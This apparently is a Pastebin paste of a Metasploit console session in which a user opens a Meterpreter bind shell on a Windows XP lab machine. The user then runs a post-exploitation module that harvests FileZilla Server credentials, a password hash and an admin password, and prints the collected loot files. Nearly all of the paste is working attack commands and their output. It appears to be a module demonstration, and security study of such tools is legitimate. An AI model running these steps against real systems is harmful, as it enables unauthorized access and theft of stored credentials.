Advertisement
Guest User

Untitled

a guest
Aug 1st, 2017
106
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.04 KB | None | 0 0
  1. fahrenheit:msf3 bannedit$ ruby msfconsole
  2.  
  3. _ _
  4. _ | | (_)_
  5. ____ ____| |_ ____ ___ ____ | | ___ _| |_
  6. | \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
  7. | | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
  8. |_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
  9. |_|
  10.  
  11.  
  12. =[ metasploit v3.6.0-beta [core:3.6 api:1.0]
  13. -- --=[ 647 exploits - 340 auxiliary
  14. -- --=[ 216 payloads - 27 encoders - 8 nops
  15. =[ svn r11875 updated today (2011.03.04)
  16.  
  17. msf > use multi/handler
  18. msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp
  19. PAYLOAD => windows/meterpreter/bind_tcp
  20. msf exploit(handler) > set RHOST 192.168.0.103
  21. RHOST => 192.168.0.103
  22. msf exploit(handler) > exploit
  23.  
  24. [*] Started bind handler
  25. [*] Starting the payload handler...
  26. [*] Sending stage (749056 bytes) to 192.168.0.103
  27. [*] Meterpreter session 1 opened (192.168.0.108:53984 -> 192.168.0.103:4444) at 2011-03-04 10:28:38 -0500
  28.  
  29. meterpreter > getuid
  30. Server username: WINDOWSXPVM\bannedit
  31. meterpreter > background
  32. msf exploit(handler) > use post/windows/gather/filezilla_server_cred
  33. msf post(filezilla_server_cred) > set SESSION 1
  34. SESSION => 1
  35. msf post(filezilla_server_cred) > run
  36.  
  37. [*] Checking for Filezilla Server directory in: C:\Program Files\FileZilla Server\
  38. [*] Found FileZilla Server
  39.  
  40. [*] Collected the following credentials:
  41. [*] Username: bannedit
  42. [*] Password: ae2b1fca515949e5d54fb22b8ed95575
  43. [*] Group: users
  44.  
  45. [*] Collected the following configuration details:
  46. [*] FTP Port: 21
  47. [*] FTP Bind IP: 0.0.0.0
  48. [*] SSL: false
  49. [*] Admin Port: 14147
  50. [*] Admin Bind IP: 0.0.0.0
  51. [*] Admin Pass: ftpadmin
  52.  
  53. [*] Post module execution completed
  54. msf post(filezilla_server_cred) >
  55.  
  56.  
  57. fahrenheit:msf3 bannedit$ cat ~/.msf3/loot/*
  58. FileZilla FTP Server Credentials
  59. ================================
  60.  
  61. Host Port User Password SSL
  62. ---- ---- ---- -------- ---
  63. 0.0.0.0 21 bannedit ae2b1fca515949e5d54fb22b8ed95575 false
  64. FileZilla FTP Server Configuration
  65. ==================================
  66.  
  67. FTP Port FTP Bind IP Admin Port Admin Bind IP Admin Password SSL SSL Certfile SSL Key Password
  68. -------- ----------- ---------- ------------- -------------- --- ------------ ----------------
  69. 21 0.0.0.0 14147 0.0.0.0 ftpadmin false
  70. FileZilla FTP Server Permissions
  71. ================================
  72.  
  73. Host User Dir FileRead FileDelete FileAppend DirCreate DirDelete DirList DirSubdirs Home AutoCreate
  74. ---- ---- --- -------- ---------- ---------- --------- --------- ------- ---------- ---- ----------
  75. 0.0.0.0 bannedit C:\Documents and Settings\bannedit\My Documents 1 0 0 0 0 0 1 1 0
  76. fahrenheit:msf3 bannedit$
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement